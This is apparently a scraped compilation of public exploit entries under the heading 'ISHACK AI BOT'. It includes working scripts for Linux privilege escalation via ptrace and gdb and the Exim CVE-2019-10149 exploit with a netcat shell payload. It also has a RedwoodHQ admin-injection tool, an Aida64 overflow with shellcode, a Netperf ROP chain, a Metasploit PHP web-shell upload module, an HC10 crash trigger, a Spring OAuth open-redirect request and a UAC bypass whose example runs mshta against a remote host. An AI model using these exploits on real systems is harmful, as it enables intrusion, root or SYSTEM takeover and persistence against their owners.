ISHACK AI BOT

[Summary] The Pronestor service "PNHM" (aka Health Monitoring or HealthMonitor) before 8.1.12.0 has "BUILTIN\Users:(I)(F)" permissions for the "%PROGRAMFILES(X86)%\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe" file, which allows local users to gain privileges via a Trojan horse PronestorHealthMonitor.exe file. During the installation of Pronestors Outlook-Add-In (version 8.1.11.0 and older) the installer creates a service named PNHM (Pronester Health Monitoring) with weak file permission running as SYSTEM. The vulnerability allows all "Authenticated Users" to potentially execute arbitrary code as SYSTEM on the local system. [Additional Information] Tested on Windows 7. Version: Outlook Add-In 8.1.11.0 and older Also tested on version 5.1.6.0 with same result. Discovered: 06-nov-2018 Reported: 07-nov-2018 Vendor: https://www.pronestor.com/ Vendor confirmed: True Fixed: Version 8.1.12.0 Attack Type: Local Privilege Escalation Vulnerability due to: Insecure Permissions Discoverer: PovlTekstTV CVE: 2018-19113 Original link: https://gist.github.com/povlteksttv/8f990e11576e1e90e8fb61acf8646d28 [Proof] C:\Users\povltekst>sc qc PNHM SERVICE_NAME: PNHM TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Pronestor HealthMonitor DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\povltekst>icacls 'C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe' C:\Program Files (x86)\proNestor\Outlook add-in for Pronestor\PronestorHealthMonitor.exe BUILTIN\Users:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) Notice: "BUILIN\Users:(I)(F)". (F) = Full access! This means that an authenticated user can change the file [Attack Vectors] Replace the file "PronestorHealthMonitor.exe" with a malicious file also called "PronesterHealthMonitor.exe". Next time the service (PNHM) starts, the malicious file will get executed as SYSTEM. The service starts on every reboot. [Affected Component] PronestorHealthMonitor.exe This exe will be executed on every reboot by a service named PNHM running as SYSTEM.

#!/usr/bin/env bash ####################################################### # # # 'ptrace_scope' misconfiguration # # Local Privilege Escalation # # # ####################################################### # Affected operating systems (TESTED): # Parrot Home/Workstation 4.6 (Latest Version) # Parrot Security 4.6 (Latest Version) # CentOS / RedHat 7.6 (Latest Version) # Kali Linux 2018.4 (Latest Version) # Authors: Marcelo Vazquez (s4vitar) # Victor Lasa (vowkin) #┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc] #└──╼ $./exploit.sh # #[*] Checking if 'ptrace_scope' is set to 0... [√] #[*] Checking if 'GDB' is installed... [√] #[*] System seems vulnerable! [√] # #[*] Starting attack... #[*] PID -> sh #[*] Path 824: /home/s4vitar #[*] PID -> bash #[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> bash #[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> bash #[*] Path 1842: /home/s4vitar #[*] PID -> bash #[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> bash #[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc # #[*] Cleaning up... [√] #[*] Spawning root shell... [√] # #bash-4.4# whoami #root #bash-4.4# id #uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar) #bash-4.4# function startAttack(){ tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null) echo "[*] Path $(pwdx $shell_pid 2>/dev/null)" fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1 done if [ -f /tmp/bash ]; then /tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..." rm /tmp/bash echo -e " [√]" echo -ne "[*] Spawning root shell..." echo -e " [√]\n" tput cnorm && bash -p' else echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]" fi } echo -ne "[*] Checking if 'ptrace_scope' is set to 0..." if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then echo " [√]" echo -ne "[*] Checking if 'GDB' is installed..." if command -v gdb >/dev/null 2>&1; then echo -e " [√]" echo -e "[*] System seems vulnerable! [√]\n" echo -e "[*] Starting attack..." startAttack else echo " [✗]" echo "[*] System is NOT vulnerable :( [✗]" fi else echo " [✗]" echo "[*] System is NOT vulnerable :( [✗]" fi; tput cnorm

# -*- encoding: utf-8 -*- #!/usr/bin/python3 # Exploit Title: RedxploitHQ (Create Admin User by missing authentication on db) # Date: 14-june-2019 # Exploit Author: EthicalHCOP # Version: 2.0 / 2.5.5 # Vendor Homepage: https://redwoodhq.com/ # Software Link: https://redwoodhq.com/redwood-download/ # Tested on: Ubuntu and Windows. # Twitter: @EthicalHcop # Usage: python3 RedxploitHQ.py -H mongo_host -P mongo_port # Description: Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework # # RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have her own Mongo Launcher. # The problem is that this vendor database doesn't require any authentication to read her data. # So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool # # POC: https://youtu.be/MK9AvoJDtxY import hashlib import hmac import optparse from pymongo import MongoClient def CreateHMAC(Pass): message = bytes(Pass,encoding='utf8') secret = bytes('redwood',encoding='utf8') hash = hmac.new(secret, message, hashlib.md5) return (hash.hexdigest()) def DbConnect(ip,port): uri = "mongodb://" + ip + ":" + port + "/" con = MongoClient(uri) return con def DbDisconnect(con): con.close() def CreateBadminUser(ip, port, user, passw): con = DbConnect(ip, port) db = con.automationframework usr = db.users passw = CreateHMAC(passw) data = { "name": user, "password": passw, "tag": [], "role": "Admin", "username": user, "status": "" } usr.insert_one(data) DbDisconnect(con) def start(): parser = optparse.OptionParser('usage %prog ' + \ '-H host -P port') parser.add_option('-P', '--Port', dest='port', type='string', \ help='MongoDB Port') parser.add_option('-H', '--Host', dest='host', type='string', \ help='MongoDB Host') (options, args) = parser.parse_args() ip = options.host port = options.port if (str(ip) == "None"): print("Insert Host") exit(0) if (str(port) == "None"): port = "27017" try: CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin') print("[+] New user 'Badmin'/'Badmin' created.") except Exception as e: print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e)) if __name__ == '__main__': start()

1. Advisory Information ======================================== Title: Clever Dog Smart Camera Vendor Homepage: http://www.cleverdog.com.cn/ Tested on Camera types : DOG-2W, DOG-2W-V4 Vulnerability: Hardware- Multiple Vulnerabilities Date: 14/06/2019 Author: Alex Akinbi Twitter: @alexakinbi 1. Unauthenticated file disclosure: ======================================== An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached. For example: http://192.168.1.81:8000/20190606 2. Telnet Backdoor using default credentials: ======================================== An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices. 3. Login password sent over network unencrypted using Clever Dog App: ======================================== Using a packet sniffer, an attacker on the same network can capture data packets and view captured user login password MD5 hash. A weak password can be cracked and used to login to the user account. 4. SOLUTION ======================================== Contact the vendor for further information regarding the proper mitigation of this vulnerability.

#!/usr/bin/python ########################################################################################################## # Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit # Author : Nipun Jaswal # Tested On : Windows 7 Home Basic(x86) # Version : 6.00.5100 # Release Date : 31/May/2019 # Build : 21/May/2019 # Vendor Homepage: https://www.aida64.com/downloads # Software Link: https://www.aida64.com/products/aida64-engineer # CVE : CVE-2019- ########################################################################################################## ##################################Steps to Reproduce###################################################### #1) Open Aida64 Engineer #2) Navigate to File-> Preferences #3) Logging --> 'Log Sensor Reading to CSV log File' #4) Paste the Content from exploit.txt to the 'Log Sensor Reading to CSV log File' field #5) Press Apply-> OK #6) Exit the Application via File-->Exit ##########################################//SHELLCODE//################################################### # msfvenom -p windows/messagebox TEXT=NIPUN-NIPUN -b '\x00\x0a\x0d' -f py --smallest buf = "" buf += "\xb8\xb6\xf7\x5f\x31\xda\xd5\xd9\x74\x24\xf4\x5f\x2b" buf += "\xc9\xb1\x42\x31\x47\x14\x83\xef\xfc\x03\x47\x10\x54" buf += "\x02\x86\xda\x03\x34\x4d\x39\xc7\xf6\x7c\xf3\x50\xc8" buf += "\x49\x90\x15\x5b\x7a\xd2\x5f\x90\xf1\x92\x83\x23\x43" buf += "\x53\x30\x4d\x6c\xe8\x70\x8a\x23\xf6\x09\x19\xe2\x07" buf += "\x20\x22\xf4\x68\x49\xb1\xd3\x4c\xc6\x0f\x20\x06\x8c" buf += "\xa7\x20\x19\xc6\x33\x9a\x01\x9d\x1e\x3b\x33\x4a\x7d" buf += "\x0f\x7a\x07\xb6\xfb\x7d\xf9\x86\x04\x4c\xc5\x15\x56" buf += "\x2b\x05\x91\xa0\xf5\x4a\x57\xae\x32\xbf\x9c\x8b\xc0" buf += "\x1b\x75\x99\xd9\xe8\xdf\x45\x1b\x05\xb9\x0e\x17\x92" buf += "\xcd\x4b\x34\x25\x39\xe0\x40\xae\xbc\x1f\xc1\xf4\x9a" buf += "\xc3\xb3\x37\x50\xf3\x1a\x63\x1c\xe1\xd4\x49\x77\x64" buf += "\xa8\x43\x64\x2a\xdd\xc4\x8b\x34\xe2\x73\x36\xcf\xa6" buf += "\xfd\x61\x2d\xab\x86\x8e\x96\x1e\x60\x20\x29\x61\x8f" buf += "\xb4\x93\x96\x07\xab\x77\x87\x96\x5b\xbb\xf5\x36\xf8" buf += "\xd3\x8c\x35\x65\x56\x5f\x62\xed\xca\xbb\x9e\x67\x14" buf += "\x95\x61\x22\xdd\x93\x5f\x9d\x66\x0b\xfd\x53\x25\xcb" buf += "\x1d\x48\x07\x3c\x42\x6f\x58\x43\x14\xe0\xdf\xe4\xc4" buf += "\x96\x7e\x72\x61\x25\xe9\x31\x0c\xda\x9a\xf8\x15\x94" buf += "\x01\xdf\xa3\x2c\x5a\x77\xe3\x7b\xd3\xd0\x6b\xca\xc6" buf += "\xae\x22\xba\x56\x66\xe4\x6f\x56\xb1\x8c\xdc\xbc\x4a" buf += "\x05\x3d\x8d\x9e\x47\xed\xbf\x4c\x98\xc1\x71\xb1\x36" ##########################################//SHELLCODE//################################################### junk= "\x41" * (1106 - len(buf)) seh = "\x87\xe2\x1d\x01" #0x011de287 - [aida64.exe] nseh = "\xeb\xf8\x90\x90" buffer = junk + buf +"\xe9\xdd\xfe\xff\xff\xcc" + nseh + seh handle = open("exploit.txt","w") handle.write(buffer) handle.close() ##########################################//END//#########################################################

#!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution. # (CVE-2019-10149) # # This is a local privilege escalation exploit for "The Return # of the WIZard" vulnerability reported by the Qualys Security # Advisory team. # # Credits: # Qualys Security Advisory team (kudos for your amazing research!) # Dennis 'dhn' Herrmann (/dev/tcp technique) # # Usage (setuid method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m setuid # Preparing setuid shell helper... # Delivering setuid payload... # [...] # Waiting 5 seconds... # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned # # id # uid=0(root) gid=0(root) groups=0(root) # # Usage (netcat method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m netcat # Delivering netcat payload... # Waiting 5 seconds... # localhost [127.0.0.1] 31337 (?) open # id # uid=0(root) gid=0(root) groups=0(root) # # Vulnerable platforms: # Exim 4.87 - 4.91 # # Tested against: # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] # METHOD="setuid" # default method PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' # usage instructions function usage() { echo "$0 [-m METHOD]" echo echo "-m setuid : use the setuid payload (default)" echo "-m netcat : use the netcat payload" echo exit 1 } # payload delivery function exploit() { # connect to localhost:25 exec 3<>/dev/tcp/localhost/25 # deliver the payload read -u 3 && echo $REPLY echo "helo localhost" >&3 read -u 3 && echo $REPLY echo "mail from:<>" >&3 read -u 3 && echo $REPLY echo "rcpt to:<$PAYLOAD>" >&3 read -u 3 && echo $REPLY echo "data" >&3 read -u 3 && echo $REPLY for i in {1..31} do echo "Received: $i" >&3 done echo "." >&3 read -u 3 && echo $REPLY echo "quit" >&3 read -u 3 && echo $REPLY } # print banner echo echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>' echo # parse command line while [ ! -z "$1" ]; do case $1 in -m) shift; METHOD="$1"; shift;; * ) usage ;; esac done if [ -z $METHOD ]; then usage fi # setuid method if [ $METHOD = "setuid" ]; then # prepare a setuid shell helper to circumvent bash checks echo "Preparing setuid shell helper..." echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null if [ $? -ne 0 ]; then echo "Problems compiling setuid shell helper, check your gcc." echo "Falling back to the /bin/sh method." cp /bin/sh /tmp/pwned fi echo # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_SETUID exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 ls -l /tmp/pwned /tmp/pwned # netcat method elif [ $METHOD = "netcat" ]; then # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_NETCAT exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 nc -v 127.0.0.1 31337 # print help else usage fi

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt [+] ISR: ApparitionSec [Vendor] www.hostingcontroller.com [Product] HC10 HC.Server Service 10.14 HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers simultaneously as part of a single cluster. HC works on an N-tier user model. [Vulnerability Type] Remote Invalid Pointer Write [CVE Reference] CVE-2019-12323 [Security Issue] The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794. In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved. If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence. Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program. The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService". Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10. SERVICE_NAME: HCServerService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HC Server Service DEPENDENCIES : HCProvisioningService SERVICE_START_NAME : LocalSystem Crash Dump: INVALID_POINTER_WRITE_EXPLOITABLE CONTEXT: (.ecxr) rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000 rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000 rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000 r8=000000000000001f r9=00000000000006fe r10=0000000000000603 r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 HC_Server+0x25b6c: 00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=?? Resetting default scope FAULTING_IP: HC_Server+25b6c 00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000001 Parameter[1]: 000000000119033d Attempt to write to address 000000000119033d PROCESS_NAME: HC.Server.exe [Exploit/POC] 1) Configure the HCServiceService recovery failure options to an arbitrary program. 2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges. from socket import * IP = raw_input("[+] HC Server Service IP ") PORT = 8794 payload = "A"*4000 s=socket(AF_INET,SOCK_STREAM) s.connect((IP, PORT)) s.send(payload) s.close() print "Triggering HC10 Server Service Xploit" print "hyp3rlinx" [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: May 14, 2019 No reply Second notification: May 21, 2019 Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019 mitre assign CVE: May 27, 2019 Vendor : "New installer to be released June 13, 2019" June 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Author: Juan Sacco <[email protected]> - http://exploitpack.com # # Tested on: Kali i686 GNU/Linux # # Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking. # It provides tests for both unidirectional troughput and end-to-end latency. # # Vendor: https://hewlettpackard.github.io/netperf/ # # Program received signal SIGSEGV, Segmentation fault. # 0x41424344 in ?? () # LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA # EAX 0x6d # EBX 0x41414141 ('AAAA') # ECX 0x6f # EDX 0x430320 (test_name) 'TCP_STREAM' # EDI 0xb7ea2000 (_GLOBAL_OFFSET_TABLE_) # ESI 0xbfffd2c0 0x3 # EBP 0x41414141 ('AAAA') # ESP 0xbfffd280 0x0 # EIP 0x41424344 ('DCBA') # Invalid address 0x41424344 # Program received signal SIGSEGV (fault address 0x41424344) # PoC: run -a `python -c 'print "A"*8220+"DCBA"'` from struct import pack # int mprotect(void *addr, size_t len, int prot); # define PROT_READ 0x1 # define PROT_WRITE 0x2 # define PROT_EXEC 0x4 # # gef p mprotect # $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect> # gef p read #{ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read> # # gef ropgadget #pop3ret = 0x402fea offset = 8220 mprotect = 0xb7dbdfd0 # <mprotect> read = 0xb7db06b0 # <read> pop3ret = 0x402fea target_memory = 0xb7fd4000 # r-xp [vdso] rop_chain = 'A' * offset rop_chain += pack('I', mprotect) # mprotect rop_chain += pack('I', pop3ret) # gadget rop_chain += pack('I', 0xbffdf000) # arg - void* rop_chain += pack('I', 0x100000) # arg size_t rop_chain += pack('I',0x7) # arg int rop_chain += pack('I', read) rop_chain += pack('I', 0xbffdf000) # return stack rop_chain += pack('I',0x00) # arg int fd rop_chain += pack('I',0xbffdf000) # arg void rop_chain += pack('I',0x200) # arg size_t print rop_chain

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => "AROX School-ERP Pro Unauthenticated Remote Code Execution", 'Description' => %q( This module exploits a command execution vulnerability in AROX School-ERP. "import_stud.php" and "upload_fille.php" do not have session control. Session start/check functions in Line 8,9,10 are disabled with slashes. Therefore an unathenticated user can execute the command on the system. ), 'License' => MSF_LICENSE, 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module ], 'References' => [ ['URL', 'http://www.pentest.com.tr/exploits/AROX-School-ERP-Pro-Unauthenticated-RCE-Metasploit.html'], ['URL', 'https://sourceforge.net/projects/school-erp-ultimate/'] # Download ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => "Jun 17 2019", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, "Base ERP directory path", '/']) ] ) end def exec(shell) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_data", "#{shell}") # shell url }) end def upload_shell(check) fname = Rex::Text.rand_text_alpha_lower(8) + ".php" @shell = "#{fname}" pdata = Rex::MIME::Message.new pdata.add_part("" + payload.encoded, 'application/octet-stream', nil, "form-data; name=\"txtdocname\"; filename=\"#{fname}\"") pdata.add_part('Submit', nil, nil, 'form-data; name="btnsubmit"') data = pdata.to_s res = send_request_cgi({ 'method' => 'POST', 'data' => data, 'agent' => 'Mozilla', 'ctype' => "multipart/form-data; boundary=#{pdata.bound}", 'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php") }) if res && res.code == 200 && res.body =~ /Successfully/ print_status("Trying to upload #{fname}") return true else fail_with(Failure::NoAccess, 'Error occurred during uploading!') return false end end def exploit unless Exploit::CheckCode::Vulnerable == check fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') end if upload_shell(true) print_good("Upload successfully.") exec(@shell) end end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php") }) unless res vprint_error 'Connection failed' return CheckCode::Unknown end if res && res.code == 200 && res.body =~ /upload_fille.php/ return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end end

# Exploit Title: Open Redirector in spring-security-oauth2 # Date: 17 June 2019 # Exploit Author: Riemann # Vendor Homepage: https://spring.io/projects/spring-security-oauth # Software Link: https://spring.io # Version: Spring Security OAuth versions 2.3 prior to 2.3.6 -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE # Tested on: UBUNTU 16.04 LTS -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE # CVE : CVE-2019-11269 | CVE-2019-3778 # Description Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code. #VULNERABILITY: By manipulating the REDIRECT_URI parameter, an attacker can actually bypass the validation. The code causing the vulnerability is found under the package org.springframework.security.oauth2.provider.endpoint The Class: DefaultRedirectResolver, which method obtainMatchingRedirect does not proper sanitation /** * Attempt to match one of the registered URIs to the that of the requested one. * * @param redirectUris the set of the registered URIs to try and find a match. This cannot be null or empty. * @param requestedRedirect the URI used as part of the request * @return the matching URI * @throws RedirectMismatchException if no match was found */ private String obtainMatchingRedirect(Set<String> redirectUris, String requestedRedirect) { Assert.notEmpty(redirectUris, "Redirect URIs cannot be empty"); if (redirectUris.size() == 1 && requestedRedirect == null) { return redirectUris.iterator().next(); } for (String redirectUri : redirectUris) { if (requestedRedirect != null && redirectMatches(requestedRedirect, redirectUri)) { return requestedRedirect; } } throw new RedirectMismatchException("Invalid redirect: " + requestedRedirect + " does not match one of the registered values: " + redirectUris.toString()); } #POC ATTACK VECTOR The following request done by the CLIENT APP after the user has logged in, contains the REDIRECT_URI parameter. The validation is bypassed by simply adding a percentage sign which triggers a redirect instead of the RedirectMismatchException error The ORIGINAL REQUEST containing a valid URI: GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login/oauth2/code/ HTTP/1.1 The attacker then tricks the application by changing entirely the URI to another server adding a percentage for example: GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:9000/login/oauth2/code/ HTTP/1.1 Host: localhost:8085 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8085/auth/login Connection: close Cookie: JSESSIONID=3394FD89204BE407CB585881755C0828; JSESSIONID=C0F1D5A2F1944DCB43F2BFFA416B7A63 Upgrade-Insecure-Requests: 1 The RESPONSE indeed does not produce an expected OAUTH error but redirects the user : HTTP/1.1 302 Cache-Control: no-store X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Location: http://localhost:8086/login/oauth2/code/?code=4ecsea&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D Content-Language: en-US Content-Length: 0 Date: Mon, 17 Jun 2019 11:06:18 GMT Connection: close

Interactive Version: <# .SYNOPSIS This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE .NOTES Function : SluiHijackBypass File Name : SluiHijackBypass.ps1 Author : Gushmazuko .LINK https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1 Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation .EXAMPLE Load "cmd.exe" (By Default used 'arch 64'): SluiHijackBypass -command "cmd.exe" -arch 64 Load "mshta http://192.168.0.30:4444/0HUGN" SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN" #> function SluiHijackBypass(){ Param ( [Parameter(Mandatory=$True)] [String]$command, [ValidateSet(64,86)] [int]$arch = 64 ) #Create registry structure New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force #Perform the bypass switch($arch) { 64 { #x64 shell in Windows x64 | x86 shell in Windows x86 Start-Process "C:\Windows\System32\slui.exe" -Verb runas } 86 { #x86 shell in Windows x64 C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas" } } #Remove registry structure Start-Sleep 3 Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force } ################################################################################ Non-Interactive Version: <# .SYNOPSIS Noninteractive version of script, for directly execute. This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE .NOTES File Name : SluiHijackBypass_direct.ps1 Author : Gushmazuko .LINK https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1 Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation .EXAMPLE Load "cmd.exe" (By Default used 'arch 64'): powershell -exec bypass .\SluiHijackBypass_direct.ps1 #> $program = "cmd.exe" New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force #For x64 shell in Windows x64: Start-Process "C:\Windows\System32\slui.exe" -Verb runas #For x86 shell in Windows x64: #C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas" Start-Sleep 3 Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force

